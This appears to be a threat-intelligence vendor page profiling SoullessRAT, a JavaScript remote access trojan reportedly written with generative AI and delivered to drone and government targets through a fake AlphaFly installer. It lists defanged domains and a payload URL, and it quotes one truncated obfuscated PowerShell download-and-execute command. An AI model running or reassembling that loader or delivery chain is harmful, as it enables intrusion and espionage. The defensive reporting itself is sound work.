SoullessRAT
SoullessRAT is an obfuscated JavaScript remote access trojan reportedly written using generative AI. It was observed in multi-stage campaigns linked in the reporting to the Versatile Werewolf threat cluster, and also referenced alongside activity associated with Eagle Werewolf. In the described intrusion chain, it was delivered via the fake drone-training installer AlphaFlyInstallV1-2.msi distributed from alphafly-drones[.]com. That chain dropped PowerShell and VBS components, downloaded Node.js if needed, executed an obfuscated JavaScript loader, and retrieved the final SoullessRAT payload from newfolder[.]click, including the URL pattern hxxps://newfolder[.]click/?cid=9ebeb834a451460e&mod=main. Reported capabilities include remote command execution, file upload and download, screenshot capture, system information harvesting and reconnaissance, module loading, Outlook data theft, logical volume enumeration, directory and file listing, and self-termination. The surrounding campaigns primarily targeted government or state organizations, military personnel, industrial entities, and individuals involved in drone manufacturing, engineering, or UAV-related activity, consistent with espionage objectives. Known associated delivery artifacts and lures include AlphaFlyInstallV1-2.msi and the fake AlphaFly installer infrastructure at alphafly-drones[.]com, with payload delivery from newfolder[.]click.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This final stage payload is an obfuscated JavaScript RAT created using generative AI. We named this trojan SoullessRAT.
Malware Family SoullessRAT Delivered via fake AlphaFly installer in Eagle Werewolf multi-stage attack chain
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
The attack chain begins with a malicious MSI installer, disguised as a legitimate software application, delivered to targeted users through deceptive websites mimicking real developer tools.
Execution
6 techniques
Execution
The loader then fetches the Node.js interpreter (if it is not present in the system) and the next stage obfuscated JS script. Upon downloading all the components, the Node.js interpreter executes the JS script.
run-script.ps1, a PowerShell script to load and execute code via PowerShell. The file contains: powershell -w hidden -ep bypass -c "I''E''X...DOWNLOADDaTa(...)"
Alongside the Fondue.exe-based attack path, the same threat cluster also deployed a separate JavaScript-based remote access trojan named SoullessRAT against other targets.
Stealth
4 techniques
Stealth
The appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer.
The dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
Discovery
2 techniques
Discovery
Collection
3 techniques
Collection
Command and Control
4 techniques
Command and Control
more than 1,350 active command-and-control (C2) servers were identified across 98 infrastructure providers in the region within just three months.
The initial MSI installer drops a PowerShell script, a VBS helper file, and a .NET loader, which work together to download and execute the next-stage payload without triggering obvious alerts.
Once loaded into the memory space of Fondue.exe, the rogue control panel file deploys a Sliver post-exploitation framework implant. Sliver is an open-source adversary simulation tool that gives attackers a powerful foothold on the infected machine, allowing them to issue remote commands and move through compromised networks with ease.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
12 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A JavaScript-based remote access trojan reportedly written using generative AI that supports espionage functions such as command execution, file upload, screenshot capture, and system information theft.
A remote access trojan delivered via a fake AlphaFly installer as part of a multi-stage Eagle Werewolf attack chain.
Remote access trojan delivered via a fake AlphaFly installer in the observed campaign.
An obfuscated JavaScript RAT delivered through MSI, PowerShell, Node.js, and JS loaders. It can upload files, download and execute modules, harvest Outlook data, collect system information, execute commands including PowerShell, take screenshots, enumerate volumes and files, and self-terminate.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.